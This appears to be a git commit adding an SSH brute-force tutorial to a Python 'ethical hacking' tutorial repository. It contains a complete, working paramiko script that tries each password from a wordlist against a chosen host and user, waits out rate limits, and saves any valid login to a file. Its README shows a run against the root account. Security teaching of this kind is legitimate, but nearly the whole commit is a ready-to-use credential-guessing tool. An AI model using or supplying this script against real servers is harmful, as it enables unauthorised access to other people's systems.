added bruteforce ssh tutorial

x4nth055 · x4nth055 · commit 5a8ee0856fde · 2019-11-09T10:40:22.000+01:00
diff --git a/README.md b/README.md
@@ -19,6 +19,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Encrypt and Decrypt Files in Python](https://www.thepythoncode.com/article/encrypt-decrypt-files-symmetric-python). ([code](ethical-hacking/file-encryption))
     - [How to Make a Subdomain Scanner in Python](https://www.thepythoncode.com/article/make-subdomain-scanner-python). ([code](ethical-hacking/subdomain-scanner))
     - [How to Use Steganography to Hide Secret Data in Images in Python](https://www.thepythoncode.com/article/hide-secret-data-in-images-using-steganography-python). ([code](ethical-hacking/steganography))
+    - [How to Brute-Force SSH Servers in Python](https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python). ([code](ethical-hacking/bruteforce-ssh))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
diff --git a/ethical-hacking/bruteforce-ssh/README.md b/ethical-hacking/bruteforce-ssh/README.md
@@ -0,0 +1,26 @@
+# [How to Brute-Force SSH Servers in Python](https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python)
+To run this:
+- `pip3 install -r requirements.txt`
+- 
+    ```
+    python bruteforce_ssh.py --help
+    ```
+    **Outputs:**
+    ```
+    usage: bruteforce_ssh.py [-h] [-P PASSLIST] [-u USER] host
+
+    SSH Bruteforce Python script.
+
+    positional arguments:
+    host                  Hostname or IP Address of SSH Server to bruteforce.
+
+    optional arguments:
+    -h, --help            show this help message and exit
+    -P PASSLIST, --passlist PASSLIST
+                            File that contain password list in each line.
+    -u USER, --user USER  Host username.
+    ```
+- If you want to bruteforce against the server `192.168.1.101` for example, the user `root` and a password list of `wordlist.txt`:
+    ```
+    python bruteforce_ssh.py 192.168.1.101 -u root -P wordlist.txt
+    ```
diff --git a/ethical-hacking/bruteforce-ssh/bruteforce_ssh.py b/ethical-hacking/bruteforce-ssh/bruteforce_ssh.py
@@ -0,0 +1,60 @@
+import threading
+import paramiko
+import socket
+import time
+from colorama import init, Fore
+
+# initialize colorama
+init()
+
+GREEN = Fore.GREEN
+RED   = Fore.RED
+RESET = Fore.RESET
+BLUE  = Fore.BLUE
+
+
+def is_ssh_open(hostname, username, password):
+    # initialize SSH client
+    client = paramiko.SSHClient()
+    # add to know hosts
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    try:
+        client.connect(hostname=hostname, username=username, password=password, timeout=3)
+    except socket.timeout:
+        # this is when host is unreachable
+        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
+        return False
+    except paramiko.AuthenticationException:
+        print(f"[!] Invalid credentials for {username}:{password}")
+        return False
+    except paramiko.SSHException:
+        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
+        # sleep for a minute
+        time.sleep(60)
+        return is_ssh_open(hostname, username, password)
+    else:
+        # connection was established successfully
+        print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
+        return True
+
+
+if __name__ == "__main__":
+    import argparse
+    parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
+    parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
+    parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
+    parser.add_argument("-u", "--user", help="Host username.")
+
+    # parse passed arguments
+    args = parser.parse_args()
+    host = args.host
+    passlist = args.passlist
+    user = args.user
+    # read the file
+    passlist = open(passlist).read().splitlines()
+    # brute-force
+    for password in passlist:
+        if is_ssh_open(host, user, password):
+            # if combo is valid, save it to a file
+            open("credentials.txt", "w").write(f"{user}@{host}:{password}")
+            break
diff --git a/ethical-hacking/bruteforce-ssh/requirements.txt b/ethical-hacking/bruteforce-ssh/requirements.txt
@@ -0,0 +1,2 @@
+colorama
+paramiko
diff --git a/ethical-hacking/bruteforce-ssh/wordlist.txt b/ethical-hacking/bruteforce-ssh/wordlist.txt
